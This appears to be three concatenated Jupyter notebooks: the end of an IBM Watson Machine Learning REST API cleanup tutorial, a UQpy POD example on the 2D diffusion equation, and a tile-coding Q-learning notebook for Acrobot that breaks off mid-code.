``` model_definition_delete = requests.delete( url = f"{WML_ENDPOINT_URL}/ml/v4/model_definitions/{model_definition_id}?version=2020-08-01&space_id={space_id}", headers = header ) if model_definition_delete.status_code in [200,202,204]: print('SUCCES') else: print(f'Failed to delete model definition: \n {model_definition_delete.json()}') ``` If you want to delete more model definitions run following cell. ``` for model_definition in model_definitions_details.json()['resources']: model_definition_delete = requests.delete( url = f"{WML_ENDPOINT_URL}/ml/v4/model_definitions/{model_definition['metadata']['id']}?version=2020-08-01&space_id={space_id}", headers = header ) if model_definition_delete.status_code in [200,202,204]: print('SUCCES') else: print(f'Failed to delete model definition: \n {model_definition_delete.json()}') ``` <a id="models"></a> ## 4. Manage models If you want to get all models details you can run following REST API call. If you want to get part of models please change the `limit` variable. ``` limit=2 models_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/models?version=2020-08-01&space_id={space_id}&limit={limit}", headers = header ) ``` In order to filter models by software specification you can paste software specification id to the `software_spec` field. ``` limit=2 software_spec="63dc4cf1-252f-424b-b52d-5cdd9814987f" models_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/models?version=2020-08-01&space_id={space_id}&limit={limit}&software_spec={software_spec}", headers = header ) ``` If you want to list existing models names and ids run next cell. ``` for model in models_details.json()['resources']: print(f"{model['metadata']['name']} \t Id: {model['metadata']['id']}") ``` Get model 0 id. ``` model_id = models_details.json()['resources'][0]['metadata']['id'] print(model_id) ``` If you want to get model details you must provide `model_id` and run following REST API call. 
``` model_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/models/{model_id}?version=2020-08-01&space_id={space_id}", headers = header ) ``` Print model details. ``` model_details.json() ``` If you want to get model revision you must provide `model_id` and run following REST API call. ``` model_revisons = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/models/{model_id}/revisions?version=2020-08-01&space_id={space_id}", headers = header ) ``` Print model revision. ``` model_revisons.json() ``` You can delete model by next cell API CALL. ``` model_delete = requests.delete( url = f"{WML_ENDPOINT_URL}/ml/v4/models/{model_id}?version=2020-08-01&space_id={space_id}", headers = header ) if model_delete.status_code in [200,202,204]: print('SUCCES') else: print(f'Failed to delete model: \n {model_delete.json()}') ``` If you want to delete more models run following cell. ``` for model in models_details.json()['resources']: model_delete = requests.delete( url = f"{WML_ENDPOINT_URL}/ml/v4/models/{model['metadata']['id']}?version=2020-08-01&space_id={space_id}", headers = header ) if model_delete.status_code in [200,202,204]: print('SUCCES') else: print(f'Failed to delete model: \n {model_delete.json()}') ``` <a id="functions"></a> ## 5. Manage functions If you want to get all functions details you can run following REST API call. If you want to get part of functions please change the `limit` variable. ``` limit=2 functions_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/functions?version=2020-08-01&space_id={space_id}&limit={limit}", headers = header ) ``` If you want to list existing functions names and ids run next cell. ``` for function in functions_details.json()['resources']: print(f"{function['metadata']['name']} \t Id: {function['metadata']['id']}") ``` Get function 0 id. 
``` function_id = functions_details.json()['resources'][0]['metadata']['id'] print(function_id) ``` If you want to get function details you must provide `function_id` and run following REST API call. ``` function_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/functions/{function_id}?version=2020-08-01&space_id={space_id}", headers = header ) ``` Print function details. ``` function_details.json() ``` You can delete function by next cell API CALL. ``` function_delete = requests.delete( url = f"{WML_ENDPOINT_URL}/ml/v4/functions/{function_id}?version=2020-08-01&space_id={space_id}", headers = header ) if function_delete.status_code in [200,202,204]: print('SUCCES') else: print(f'Failed to delete function: \n {function_delete.json()}') ``` If you want to delete more functions run following cell. ``` for function in functions_details.json()['resources']: function_delete = requests.delete( url = f"{WML_ENDPOINT_URL}/ml/v4/functions/{function['metadata']['id']}?version=2020-08-01&space_id={space_id}", headers = header ) if function_delete.status_code in [200,202,204]: print('SUCCES') else: print(f'Failed to delete function: \n {function_delete.json()}') ``` <a id="experiments"></a> ## 6. Manage experiments If you want to get all experiments details you can run following REST API call. If you want to get part of experiments please change the `limit` variable. ``` limit=2 experiments_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/experiments?version=2020-08-01&space_id={space_id}", headers = header ) ``` If you want to list existing experiments names and ids run next cell. ``` for experiment in experiments_details.json()['resources']: print(f"{experiment['metadata']['name']} \t Id: {experiment['metadata']['id']}") ``` Get experiment 0 id. ``` experiment_id = experiments_details.json()['resources'][0]['metadata']['id'] print(experiment_id) ``` If you want to get experiment details you must provide `experiment_id` and run following REST API call. 
``` experiment_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/experiments/{experiment_id}?version=2020-08-01&space_id={space_id}", headers = header ) ``` Print experiment details. ``` experiment_details.json() ``` You can delete experiment by next cell API CALL. ``` experiment_delete = requests.delete( url = f"{WML_ENDPOINT_URL}/ml/v4/experiments/{experiment_id}?version=2020-08-01&space_id={space_id}", headers = header ) if experiment_delete.status_code in [200,202,204]: print('SUCCES') else: print(f'Failed to delete experiment: \n {experiment_delete.json()}') ``` If you want to delete more experiments change run following cell. ``` for experiment in experiments_details.json()['resources']: experiment_delete = requests.delete( url = f"{WML_ENDPOINT_URL}/ml/v4/experiments/{experiment['metadata']['id']}?version=2020-08-01&space_id={space_id}", headers = header ) if experiment_delete.status_code in [200,202,204]: print('SUCCES') else: print(f'Failed to delete experiment: \n {experiment_delete.json()}') ``` <a id="trainings"></a> ## 7. Manage trainings If you want to get all trainings details you can run following REST API call. If you want to get part of trainings please change the `limit` variable. ``` limit=2 trainings_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/trainings?version=2020-08-01&space_id={space_id}&limit={limit}", headers = header ) ``` In order to filter trainings by the training type (e.g. pipeline, experiment) please change `training_type` variable and run next cell. ``` limit=2 training_type='pipeline' trainings_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/trainings?version=2020-08-01&space_id={space_id}&limit={limit}&type={training_type}", headers = header ) ``` If you want to list existing trainings tags and ids run next cell. ``` for training in trainings_details.json()['resources']: print(f"{training['metadata']['tags']} \t Id: {training['metadata']['id']}") ``` Get training 0 id. 
``` training_id = trainings_details.json()['resources'][0]['metadata']['id'] print(training_id) ``` If you want to get training details you must provide `training_id` and run following REST API call. ``` training_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/trainings/{training_id}?version=2020-08-01&space_id={space_id}", headers = header ) ``` Print training details. ``` training_details.json() ``` You can delete training by next cell API CALL. **Note:** `DELETE` CALL has parameter `hard_delete`, please change it as fallows: - 'true' - to delete the completed or canceled training runs. - 'false' - to cancel the currently running training run. ``` hard_delete = 'true' training_delete = requests.delete( url = f"{WML_ENDPOINT_URL}/ml/v4/trainings/{training_id}?version=2020-08-01&space_id={space_id}&hard_delete={hard_delete}", headers = header ) if training_delete.status_code in [200,202,204]: print('SUCCES') else: print(f'Failed to delete training: \n {training_delete.json()}') ``` <a id="deployments"></a> ## 8. Manage deployments If you want to get all deployments details you can run following REST API call. If you want to get part of deployments please change the `limit` variable. ``` limit=2 deployments_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/deployments?version=2020-08-01&space_id={space_id}&limit={limit}", headers = header ) ``` If you want to list existing deployments names and ids run next cell. ``` for deployment in deployments_details.json()['resources']: print(f"{deployment['metadata']['name']} \t Id: {deployment['metadata']['id']}") ``` Get deployment 0 id. ``` deployment_id = deployments_details.json()['resources'][0]['metadata']['id'] print(deployment_id) ``` If you want to get deployment details you must provide `deployment_id` and run following REST API call. 
``` deployment_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/deployments/{deployment_id}?version=2020-08-01&space_id={space_id}", headers = header ) ``` Print deployment details. ``` deployment_details.json() ``` You can delete deployment by next cell API CALL. ``` deployment_delete = requests.delete( url = f"{WML_ENDPOINT_URL}/ml/v4/deployments/{deployment_id}?version=2020-08-01&space_id={space_id}", headers = header ) if deployment_delete.status_code in [200,202,204]: print('SUCCES') else: print(f'Failed to delete deployment: \n {deployment_delete.json()}') ``` If you want to delete more deployments run following cell. ``` for deployment in deployments_details.json()['resources']: deployment_delete = requests.delete( url = f"{WML_ENDPOINT_URL}/ml/v4/deployments/{deployment['metadata']['id']}?version=2020-08-01&space_id={space_id}", headers = header ) if deployment_delete.status_code in [200,202,204]: print('SUCCES') else: print(f'Failed to delete deployment: \n {deployment_delete.json()}') ``` <a id="summary"></a> ## 9. Summary and next steps You successfully completed this notebook! You learned how to use REST API client for Watson Machine Learning instance management and clean up. Check out our _[Online Documentation](https://dataplatform.cloud.ibm.com/docs/content/wsj/getting-started/welcome-main.html?context=analytics?pos=2)_ for more samples, tutorials, documentation, how-tos, and blog posts. ### Authors **Szymon Kucharczyk**, Software Engineer at IBM. Copyright © 2020, 2021 IBM. This notebook and its source code are released under the terms of the MIT License.
github_jupyter
# Proper Orthogonal Decomposition Example 2 Author: Katiana Kontolati \ Date: August 27, 2020 In this example, the diffusion equation is solved and then methods from the POD class are used to decompose the output solutions/dataset and extract its basis functions which can be used for the reconstruction of the solution. ## 2D Diffusion equation > $\displaystyle \frac{\partial U}{\partial t} = D \bigg(\frac{\partial^2 U}{\partial x^2} + \frac{\partial^2 U}{\partial y^2}\bigg)$ > <br> > <br> > where $D$ is the diffusion coefficient. $U$ describes the behavior of the particles in Brownian motion, resulting from their random movements and collisions. <img src="plate_and_disc.png" alt="plate_and_disc.png" height="160" width="160" align=right> ### Problem description: > - A 2D metal plate is initially at temperature $T_{cool}$. > - A disc of a specified size inside the plate is at temperature $T_{hot}$. > - Suppose that the edges of the plate are held fixed at $T_{cool}$. > - The diffusion equation is applied to follow the evolution of the temperature of the plate. Import the necessary libraries. Here we import standard libraries such as numpy, matplotlib, and we also import the POD class from UQpy. ``` import numpy as np import matplotlib.pyplot as plt from UQpy.DimensionReduction import DirectPOD, SnapshotPOD, HOSVD from DiffusionEquation import diffusion import time ``` The diffusion equation is solved by calling the 'diffusion' function and a dataset (list) is obtained. To run this function the following need to be specified: > - w, h - Plate size, mm > - dx, dy - Intervals in x-, y- directions, mm > - D - Thermal diffusivity, mm2.s-1 > - Tcool, Thot - Plate and disc temperature > - r, cx, cy - Initial conditions - ring of inner radius r, width dr centred at (cx,cy) (mm) > - nsteps - Number of time steps ``` w = h = 5. 
dx, dy = 0.1, 0.1 D = 5 Tcool, Thot = 400, 700 r, cx, cy = 1.5, 2.5, 2.5 nsteps = 500 Data = diffusion(w, h, dx, dy, D, Tcool, Thot, r, cx, cy, nsteps) ``` The Direct POD method is used to reconstruct the data for different values of spatial modes. Full reconstruction is achieved when the number of modes chosen equals the number of dimensions. Since the dataset for this problem is large, the Snapshot POD is recommended as the decomposition will be performed much faster. ``` start_time = time.time() n_modes = [1, 2, 3, 4, 40, 50] frame = 40 Data_modes = [] for i in range(len(n_modes)): pod = DirectPOD(input_sol=Data, modes=n_modes[i], verbose=False) Data_reconstr, Data_reduced = pod.run() Data_modes.append(Data_reconstr[:,:,frame]) del Data_reconstr elapsed_time = time.time() - start_time time.strftime("%H:%M:%S", time.gmtime(elapsed_time)) print('Elapsed time: ', elapsed_time) ``` Comparison of input and reduced solution. ``` # Plot input solution plt.figure(figsize = (16,2.5)) c = plt.imshow(Data[frame], cmap=plt.get_cmap('coolwarm'), vmin=Tcool,vmax=Thot) plt.colorbar(c) plt.title('Input solution',fontweight ="bold",size=15) plt.show() # Plot reduced solution fig = plt.figure(figsize=(10,7)) fig.subplots_adjust(hspace=0.5, wspace=0.4) for i in range(len(n_modes)): ax = fig.add_subplot(2, 3, i+1) im = ax.imshow(Data_modes[i], cmap=plt.get_cmap('coolwarm'), vmin=Tcool,vmax=Thot) ax.set_axis_off() ax.set_title('Mode {}'.format(n_modes[i]),size=15) fig.subplots_adjust(right=0.85) cbar_ax = fig.add_axes([0.9, 0.15, 0.03, 0.7]) cbar_ax.set_xlabel('$T$ / K', labelpad=20) fig.colorbar(im, cax=cbar_ax) fig.suptitle('Reconstructed solution',fontweight="bold",size=15) plt.show() ```
github_jupyter
# Tile Coding --- Tile coding is an innovative way of discretizing a continuous space that enables better generalization compared to a single grid-based approach. The fundamental idea is to create several overlapping grids or _tilings_; then for any given sample value, you need only check which tiles it lies in. You can then encode the original continuous value by a vector of integer indices or bits that identifies each activated tile. ### 1. Import the Necessary Packages ``` # Import common libraries import sys import gym import numpy as np import matplotlib.pyplot as plt import pandas as pd import time import copy # Set plotting options %matplotlib inline plt.style.use('ggplot') np.set_printoptions(precision=3, linewidth=120) ``` ### 2. Specify the Environment, and Explore the State and Action Spaces We'll use [OpenAI Gym](https://gym.openai.com/) environments to test and develop our algorithms. These simulate a variety of classic as well as contemporary reinforcement learning tasks. Let's begin with an environment that has a continuous state space, but a discrete action space. ``` # Create an environment env = gym.make('Acrobot-v1') env.seed(505); # Explore state (observation) space print("State space:", env.observation_space) print("- low:", env.observation_space.low) print("- high:", env.observation_space.high) # Explore action space print("Action space:", env.action_space) state = env.reset() score = 0 start_time = time.time() n_steps = 0 while True: n_steps += 1 action = env.action_space.sample() env.render() state, reward, done, _ = env.step(action) score += reward if done: break print(n_steps, 'steps in', round(time.time() - start_time, 3), 'seconds') print('Final score:', score) env.close() ``` Note that the state space is multi-dimensional, with most dimensions ranging from -1 to 1 (positions of the two joints), while the final two dimensions have a larger range. How do we discretize such a space using tiles? ### 3. 
Tiling Let's first design a way to create a single tiling for a given state space. This is very similar to a uniform grid! The only difference is that you should include an offset for each dimension that shifts the split points. For instance, if `low = [-1.0, -5.0]`, `high = [1.0, 5.0]`, `bins = (10, 10)`, and `offsets = (-0.1, 0.5)`, then return a list of 2 NumPy arrays (2 dimensions) each containing the following split points (9 split points per dimension): ``` [array([-0.9, -0.7, -0.5, -0.3, -0.1, 0.1, 0.3, 0.5, 0.7]), array([-3.5, -2.5, -1.5, -0.5, 0.5, 1.5, 2.5, 3.5, 4.5])] ``` Notice how the split points for the first dimension are offset by `-0.1`, and for the second dimension are offset by `+0.5`. This might mean that some of our tiles, especially along the perimeter, are partially outside the valid state space, but that is unavoidable and harmless. ``` def create_tiling_grid(low, high, bins=(10, 10), offsets=(0.0, 0.0)): """Define a uniformly-spaced grid that can be used for tile-coding a space. Parameters ---------- low : array_like Lower bounds for each dimension of the continuous space. high : array_like Upper bounds for each dimension of the continuous space. bins : tuple Number of bins or tiles along each corresponding dimension. offsets : tuple Split points for each dimension should be offset by these values. Returns ------- grid : list of array_like A list of arrays containing split points for each dimension. """ assert len(low) == len(high) == len(bins) == len(offsets),\ "all lengths must match: given lengths are {}, {}, {}, {}".format(len(low), len(high), len(bins), len(offsets)) return [np.linspace(start=low[dim], stop=high[dim], num=bins[dim] + 1)[1:-1] + offsets[dim] for dim in range(len(bins))] low = [-1.0, -5.0] high = [1.0, 5.0] create_tiling_grid(low, high, bins=(10, 10), offsets=(-0.1, 0.5)) # [test] ``` You can now use this function to define a set of tilings that are a little offset from each other. 
``` def create_tilings(low, high, tiling_specs): """Define multiple tilings using the provided specifications. Parameters ---------- low : array_like Lower bounds for each dimension of the continuous space. high : array_like Upper bounds for each dimension of the continuous space. tiling_specs : list of tuples A sequence of (bins, offsets) to be passed to create_tiling_grid(). Returns ------- tilings : list A list of tilings (grids), each produced by create_tiling_grid(). """ return [create_tiling_grid(low, high, bins, offsets) for bins, offsets in tiling_specs] # Tiling specs: [(<bins>, <offsets>), ...] tiling_specs = [((10, 10), (-0.066, -0.33)), ((10, 10), (0.0, 0.0)), ((10, 10), (0.066, 0.33))] tilings = create_tilings(low, high, tiling_specs) ``` It may be hard to gauge whether you are getting desired results or not. So let's try to visualize these tilings. ``` from matplotlib.lines import Line2D plt.rcParams['figure.facecolor'] = 'w' def visualize_tilings(tilings): """Plot each tiling as a grid.""" prop_cycle = plt.rcParams['axes.prop_cycle'] colors = prop_cycle.by_key()['color'] linestyles = ['-', '--', ':'] legend_lines = [] fig, ax = plt.subplots(figsize=(10, 10)) for i, grid in enumerate(tilings): for x in grid[0]: l = ax.axvline(x=x, color=colors[i % len(colors)], linestyle=linestyles[i % len(linestyles)], label=i) for y in grid[1]: l = ax.axhline(y=y, color=colors[i % len(colors)], linestyle=linestyles[i % len(linestyles)]) legend_lines.append(l) ax.grid(False) ax.legend(legend_lines, ["Tiling #{}".format(t) for t in range(len(legend_lines))], facecolor='white', framealpha=0.9) ax.set_title("Tilings") return ax # return Axis object to draw on later, if needed visualize_tilings(tilings); ``` Great! Now that we have a way to generate these tilings, we can next write our encoding function that will convert any given continuous state value to a discrete vector. ### 4. 
Tile Encoding Implement the following to produce a vector that contains the indices for each tile that the input state value belongs to. The shape of the vector can be the same as the arrangment of tiles you have, or it can be ultimately flattened for convenience. You can use the same `discretize()` function here from grid-based discretization, and simply call it for each tiling. ``` def discretize(sample, grid): """Discretize a sample as per given grid. Parameters ---------- sample : array_like A single sample from the (original) continuous space. grid : list of array_like A list of arrays containing split points for each dimension. Returns ------- discretized_sample : array_like A sequence of integers with the same number of dimensions as sample. """ return tuple(int(np.digitize(sample_point, corresponding_grid)) for sample_point, corresponding_grid in zip(sample, grid)) def tile_encode(sample, tilings, flatten=False): """Encode given sample using tile-coding. Parameters ---------- sample : array_like A single sample from the (original) continuous space. tilings : list A list of tilings (grids), each produced by create_tiling_grid(). flatten : bool If true, flatten the resulting binary arrays into a single long vector. Returns ------- encoded_sample : list or array_like A list of binary vectors, one for each tiling, or flattened into one. """ encoded_sample = [discretize(sample, grid) for grid in tilings] return np.concatenate(encoded_sample) if flatten else encoded_sample # Test with some sample values samples = [(-1.2 , -5.1 ), (-0.75, 3.25), (-0.5 , 0.0 ), ( 0.25, -1.9 ), ( 0.15, -1.75), ( 0.75, 2.5 ), ( 0.7 , -3.7 ), ( 1.0 , 5.0 )] encoded_samples = [tile_encode(sample, tilings) for sample in samples] print("\nSamples:", repr(samples), sep="\n") print("\nEncoded samples:", repr(encoded_samples), sep="\n") ``` Note that we did not flatten the encoding above, which is why each sample's representation is a pair of indices for each tiling. 
This makes it easy to visualize it using the tilings. ``` from matplotlib.patches import Rectangle def visualize_encoded_samples(samples, encoded_samples, tilings, low=None, high=None): """Visualize samples by activating the respective tiles.""" samples = np.array(samples) # for ease of indexing # Show tiling grids ax = visualize_tilings(tilings) # If bounds (low, high) are specified, use them to set axis limits if low is not None and high is not None: ax.set_xlim(low[0], high[0]) ax.set_ylim(low[1], high[1]) else: # Pre-render (invisible) samples to automatically set reasonable axis limits, and use them as (low, high) ax.plot(samples[:, 0], samples[:, 1], 'o', alpha=0.0) low = [ax.get_xlim()[0], ax.get_ylim()[0]] high = [ax.get_xlim()[1], ax.get_ylim()[1]] # Map each encoded sample (which is really a list of indices) to the corresponding tiles it belongs to tilings_extended = [np.hstack((np.array([low]).T, grid, np.array([high]).T)) for grid in tilings] # add low and high ends tile_centers = [(grid_extended[:, 1:] + grid_extended[:, :-1]) / 2 for grid_extended in tilings_extended] # compute center of each tile tile_toplefts = [grid_extended[:, :-1] for grid_extended in tilings_extended] # compute topleft of each tile tile_bottomrights = [grid_extended[:, 1:] for grid_extended in tilings_extended] # compute bottomright of each tile prop_cycle = plt.rcParams['axes.prop_cycle'] colors = prop_cycle.by_key()['color'] for sample, encoded_sample in zip(samples, encoded_samples): for i, tile in enumerate(encoded_sample): # Shade the entire tile with a rectangle topleft = tile_toplefts[i][0][tile[0]], tile_toplefts[i][1][tile[1]] bottomright = tile_bottomrights[i][0][tile[0]], tile_bottomrights[i][1][tile[1]] ax.add_patch(Rectangle(topleft, bottomright[0] - topleft[0], bottomright[1] - topleft[1], color=colors[i], alpha=0.33)) # In case sample is outside tile bounds, it may not have been highlighted properly if any(sample < topleft) or any(sample > bottomright): # So plot 
a point in the center of the tile and draw a connecting line cx, cy = tile_centers[i][0][tile[0]], tile_centers[i][1][tile[1]] ax.add_line(Line2D([sample[0], cx], [sample[1], cy], color=colors[i])) ax.plot(cx, cy, 's', color=colors[i]) # Finally, plot original samples ax.plot(samples[:, 0], samples[:, 1], 'o', color='r') ax.margins(x=0, y=0) # remove unnecessary margins ax.set_title("Tile-encoded samples") return ax visualize_encoded_samples(samples, encoded_samples, tilings); ``` Inspect the results and make sure you understand how the corresponding tiles are being chosen. Note that some samples may have one or more tiles in common. ### 5. Q-Table with Tile Coding The next step is to design a special Q-table that is able to utilize this tile coding scheme. It should have the same kind of interface as a regular table, i.e. given a `<state, action>` pair, it should return a `<value>`. Similarly, it should also allow you to update the `<value>` for a given `<state, action>` pair (note that this should update all the tiles that `<state>` belongs to). The `<state>` supplied here is assumed to be from the original continuous state space, and `<action>` is discrete (and integer index). The Q-table should internally convert the `<state>` to its tile-coded representation when required. ``` class QTable: """Simple Q-table.""" def __init__(self, state_size, action_size): """Initialize Q-table. Parameters ---------- state_size : tuple Number of discrete values along each dimension of state space. action_size : int Number of discrete actions in action space. """ self.state_size = state_size self.action_size = action_size self.q_table = np.zeros(state_size + (action_size,)) def __getitem__(self, key): return self.q_table[key] class TiledQTable: """Composite Q-table with an internal tile coding scheme.""" def __init__(self, low, high, tiling_specs, action_size): """Create tilings and initialize internal Q-table(s). 
Parameters ---------- low : array_like Lower bounds for each dimension of state space. high : array_like Upper bounds for each dimension of state space. tiling_specs : list of tuples A sequence of (bins, offsets) to be passed to create_tilings() along with low, high. action_size : int Number of discrete actions in action space. """ self.tilings = create_tilings(low, high, tiling_specs) self.state_sizes = [tuple(len(splits) + 1 for splits in tiling_grid) for tiling_grid in self.tilings] self.__first_indices = np.cumsum([0] + [np.prod(state_size) for state_size in self.state_sizes[:-1]]) self.__strides = np.array([tuple(np.prod(state_size[i:]) for i in range(1, len(state_size))) + (1,) for state_size in self.state_sizes]) self.action_size = action_size # self.q_tables = [QTable(state_size, self.action_size) for state_size in self.state_sizes] self.__flat_q_tables = np.zeros((self.__first_indices[-1] + np.prod(self.state_sizes[-1]), action_size)) @property def q_tables(self): start_ends = [tuple(self.__first_indices[i:i+2]) for i in range(len(self.__first_indices) - 1)] + [(self.__first_indices[-1], None)] return [self.__flat_q_tables[start_end[0]:start_end[1]].reshape(state_size + (self.action_size,)) for state_size, start_end in zip(self.state_sizes, start_ends)] @q_tables.setter def q_tables(self, q_tables): if isinstance(q_tables, (tuple, list)): if len(q_tables) == len(self.q_tables): for i, (old_q_table, new_q_table) in enumerate(zip(self.q_tables, new_q_table)): if old_q_table.shape != new_q_table.shape: raise RuntimeError("all Q tables must have the same dimensionality"\ "as the original ones: mismatch found in index {}"\ " - New {}, Old {}".format(i, new_q_table.shape, old_q_table.shape)) for old_q_table, new_q_table in zip(self.q_tables, new_q_table): old_q_table[:] = new_q_table else: if q_tables.shape != self.__flat_q_tables.shape: raise RuntimeError("the given Q table array must have the same dimensions as the "\ "original state-flattened Q table: given - 
{}, original - {}"\ .format(q_tables.shape, self.__flat_q_tables.shape)) self.__flat_q_tables = q_tables def get(self, state, action): """Get Q-value for given <state, action> pair. Parameters ---------- state : array_like Vector representing the state in the original continuous space. action : int Index of desired action. Returns ------- value : float Q-value of given <state, action> pair, averaged from all internal Q-tables. """ # tile_indices = tile_encode(state, self.tilings) # return np.mean([q_table.q_table[tile_idx] for q_table, tile_idx in zip(self.q_tables, tile_indices)]) state_indices = np.sum(tile_encode(state, self.tilings) * self.__strides, axis=1, keepdims=False) + self.__first_indices return np.mean(self.__flat_q_tables[state_indices, action]) def get_action_values(self, state): """Get all Q-values for given state. Parameters ---------- state : array_like Vector representing the state in the original continuous space. Returns ------- value : ndarray Q-values of given state, averaged from all internal Q-tables. """ state_indices = np.sum(tile_encode(state, self.tilings) * self.__strides, axis=1, keepdims=False) + self.__first_indices return np.mean(self.__flat_q_tables[state_indices], axis=0) def update(self, state, action, value, alpha=0.1): """Soft-update Q-value for given <state, action> pair to value. Instead of overwriting Q(state, action) with value, perform soft-update: Q(state, action) = alpha * value + (1.0 - alpha) * Q(state, action) Parameters ---------- state : array_like Vector representing the state in the original continuous space. action : int Index of desired action. value : float Desired Q-value for <state, action> pair. alpha : float Update factor to perform soft-update, in [0.0, 1.0] range. 
""" # tile_indices = tile_encode(state, self.tilings) # for q_table, tile_idx in zip(self.q_tables, tile_indices): # q_table.q_table[tile_idx] += alpha * (value - q_table.q_table[tile_idx]) state_indices = np.sum(tile_encode(state, self.tilings) * self.__strides, axis=1, keepdims=False) + self.__first_indices self.__flat_q_tables[state_indices, action] += alpha * (value - self.__flat_q_tables[state_indices, action]) # Test with a sample Q-table tq = TiledQTable(low, high, tiling_specs, 2) s1 = 3; s2 = 4; a = 0; q = 1.0 print("[GET] Q({}, {}) = {}".format(samples[s1], a, tq.get(samples[s1], a))) # check value at sample = s1, action = a print("[UPDATE] Q({}, {}) = {}".format(samples[s2], a, q)); tq.update(samples[s2], a, q) # update value for sample with some common tile(s) print("[GET] Q({}, {}) = {}".format(samples[s1], a, tq.get(samples[s1], a))) # check value again, should be slightly updated print(len(tq.q_tables)) print(*(q.shape for q in tq.q_tables)) ``` If you update the q-value for a particular state (say, `(0.25, -1.91)`) and action (say, `0`), then you should notice the q-value of a nearby state (e.g. `(0.15, -1.75)` and same action) has changed as well! This is how tile-coding is able to generalize values across the state space better than a single uniform grid. ### 6. Implement a Q-Learning Agent using Tile-Coding Now it's your turn to apply this discretization technique to design and test a complete learning agent! 
``` class QLearningAgent: """Q-Learning agent that can act on a continuous state space by discretizing it.""" def __init__(self, env, tq, alpha=0.02, alpha_decay_rate=None, min_alpha=None, gamma=0.99, epsilon=1.0, epsilon_decay_rate=0.9995, min_epsilon=.01, seed=0): """Initialize variables, create grid for discretization.""" # Environment info self.env = env self.tq = tq self.state_sizes = tq.state_sizes # list of state sizes for each tiling self.action_size = self.env.action_space.n # 1-dimensional discrete action space self.seed = np.random.seed(seed) print("Environment:", self.env) print("State space sizes:", self.state_sizes) print("Action space size:", self.action_size) # Learning parameters self.alpha = self.initial_alpha = alpha # learning rate self.alpha_decay_rate = alpha_decay_rate if alpha_decay_rate else 1.0 self.min_alpha = min_alpha if min_alpha else 0. self.gamma = gamma # discount factor self.epsilon = self.initial_epsilon = epsilon # initial exploration rate self.epsilon_decay_rate = epsilon_decay_rate # how quickly should we decrease epsilon self.min_epsilon = min_epsilon def reset_episode(self, state): """Reset variables for a new episode.""" # Gradually decrease exploration rate self.epsilon *= self.epsilon_decay_rate self.epsilon = max(self.epsilon, self.min_epsilon) self.alpha *= self.alpha_decay_rate self.alpha = max(self.alpha, self.min_alpha) self.last_state = state # Q_s = [self.tq.get(state, action) for action in range(self.action_size)] Q_s = self.tq.get_action_values(state) self.last_action = np.argmax(Q_s) return self.last_action def reset_learning(self, alpha=None): """Reset learning rate used when training.""" self.alpha = alpha if alpha is not None else self.initial_alpha def reset_exploration(self, epsilon=None): """Reset exploration rate used when training.""" self.epsilon = epsilon if epsilon is not None else self.initial_epsilon def act(self, state, reward=None, done=None, mode='train'): """Pick next action and update internal Q 
table (when mode != 'test').""" # Q_s = [self.tq.get(state, action) for action in range(self.action_size)] Q_s = self.tq.get_action_values(state) # Pick the best action from Q table greedy_action = np.argmax(Q_s) if mode == 'test': # Test mode: Simply produce an action action = greedy_action else: # Train mode (default): Update Q table, pick next action # Note: We update the Q table entry for the *last* (state, action) pair with current state, reward value = reward + self.gamma * max(Q_s) self.tq.update(self.last_state, self.last_action, value, self.alpha) # Exploration vs. exploitation do_exploration = np.random.uniform(0, 1) < self.epsilon if do_exploration: # Pick a random action action = np.random.randint(0, self.action_size) else: # Pick the greedy action action = greedy_action # Roll over current state, action for next step self.last_state = state self.last_action = action return action n_bins = 15 bins = tuple([n_bins]*env.observation_space.shape[0]) offset_pos = (env.observation_space.high - env.observation_space.low)/(3*n_bins) tiling_specs = [(bins, -3 * offset_pos), (bins, -2 * offset_pos), (bins, -offset_pos), (bins, tuple([0.0]*env.observation_space.shape[0])), (bins, offset_pos), (bins, 2 * offset_pos), (bins, 3 * offset_pos)] tq = TiledQTable(env.observation_space.low, env.observation_space.high, tiling_specs, env.action_space.n) def get_decay_rate(initial, final, duration): return (final / initial) ** (1 / duration) initial_alpha = 0.05 final_alpha = 0.05 alpha_decay_duration = 300 alpha_decay_rate = get_decay_rate(initial_alpha, final_alpha, alpha_decay_duration) print("Alpha decay rate:", alpha_decay_rate) initial_epsilon = 1.0 final_epsilon = 0.001 epsilon_decay_duration = 30000 epsilon_decay_rate = get_decay_rate(initial_epsilon, final_epsilon, epsilon_decay_duration) print("Epsilon decay rate:", epsilon_decay_rate) agent = QLearningAgent(env, tq, alpha=initial_alpha, # 0.02 alpha_decay_rate=alpha_decay_rate, # None min_alpha=0.00001, # None 
gamma=0.99, # 0.99 epsilon=initial_epsilon, # 1.0 epsilon_decay_rate=epsilon_decay_rate, # 0.9995 min_epsilon=0.00001) # 0.01 def run(agent, env, num_episodes=10000, mode='train', alpha_resets=None, epsilon_resets=None, print_every=100): """Run agent in given reinforcement learning environment and return scores.""" alpha_reset_at, alpha_reset_vals, alpha_new_decay_rates = zip(*alpha_resets) if alpha_resets else ([], [], []) epsilon_reset_at, epsilon_reset_vals, epsilon_new_decay_rates = zip(*epsilon_resets) if epsilon_resets else ([], [], []) scores = [] max_avg_score = avg_score = -np.inf best_score = max_avg_score best_agent = copy.deepcopy(agent) for i_episode in range(1, num_episodes+1): # Initialize episode state = env.reset() action = agent.reset_episode(state) total_reward = 0 done = False # Roll out steps until done while not done: state, reward, done, info = env.step(action) total_reward += reward action = agent.act(state, reward, done, mode) # Save final score scores.append(total_reward) # Print episode stats if mode == 'train': if total_reward > best_score: best_score = total_reward best_agent = copy.deepcopy(agent) if i_episode in alpha_reset_at: new_alpha = alpha_reset_vals[alpha_reset_at.index(i_episode)] agent.reset_learning(new_alpha) new_decay = alpha_new_decay_rates[alpha_reset_at.index(i_episode)] if new_decay: agent.alpha_decay_rate = new_decay if i_episode in epsilon_reset_at: new_epsilon = 